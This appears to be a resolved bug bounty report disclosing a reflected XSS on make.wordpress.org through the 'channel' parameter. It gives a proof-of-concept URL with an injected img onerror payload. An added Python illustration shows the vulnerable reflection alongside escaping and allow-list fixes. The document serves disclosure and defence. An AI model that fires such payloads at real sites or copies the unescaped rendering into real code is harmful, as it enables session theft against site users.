Reflected XSS on https://make.wordpress.org via 'channel' parameter
Severity: High
Program: WordPress
Reported by: gnux

Vulnerability Details
Technical details and impact analysis
Hi there,
I just found a reflected XSS on the make.wordpress.org domain.
Steps to reproduce:
1. Visit this link:
https://make.wordpress.org/chat/logs?channel=16%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&date=2019-07-21&no_bots=1
2. An XSS pop-up will occur.
POC:
See: wp reflected xss.png
Note: it works on the latest version of Firefox.
## Impact
Some XSS impacts, like stealing cookies, session hijacking, etc.
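The report does not include the server-side code, so the following is an added illustration (not WordPress's own code) of the bug class it describes: the `channel` query parameter reflected, unescaped, into a double-quoted HTML attribute, which is what the payload's leading `"` is shaped to break out of. It assumes a hypothetical `<input>` rendering and shows the attribute-context escaping plus the numeric allow-list check that would have prevented it; the URL is the one from the report, used here only as test input.

```python
import html
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# The URL quoted in the report, used as constructed sample input.
REPORT_URL = ("https://make.wordpress.org/chat/logs?channel=16%22%3E%3Cimg%20src=x"
              "%20onerror=alert(document.domain)%3E&date=2019-07-21&no_bots=1")


def channel_param(url: str) -> str:
    """Return the percent-decoded 'channel' query parameter ('' if absent)."""
    return parse_qs(urlsplit(url).query).get("channel", [""])[0]


def render_unsafe(channel: str) -> str:
    """Hypothetical vulnerable rendering: raw parameter dropped into an attribute value."""
    return f'<input name="channel" value="{channel}">'


def render_safe(channel: str) -> str:
    """Hardened rendering: escape for the attribute context (quote=True covers \" and ')."""
    return f'<input name="channel" value="{html.escape(channel, quote=True)}">'


# Chat channels in the report are referenced by a numeric id, so allow-list digits only.
CHANNEL_ID = re.compile(r"[0-9]{1,10}")


def validate_channel(channel: str) -> Optional[str]:
    """Return the channel id if it is purely numeric, otherwise None (reject the request)."""
    return channel if CHANNEL_ID.fullmatch(channel) else None


def breaks_out_of_attribute(markup: str) -> bool:
    """Detection helper for tests: the template emits exactly one tag, so a second '<'
    means the parameter escaped the attribute value."""
    return markup.count("<") > 1


if __name__ == "__main__":
    value = channel_param(REPORT_URL)
    print("unsafe :", render_unsafe(value), breaks_out_of_attribute(render_unsafe(value)))
    print("safe   :", render_safe(value), breaks_out_of_attribute(render_safe(value)))
    print("allowed:", validate_channel(value))
```

Escaping fixes the reflection regardless of the input; the allow-list is defence in depth, since the parameter never legitimately needs anything but digits.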
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Weakness: Cross-site Scripting (XSS) - Reflected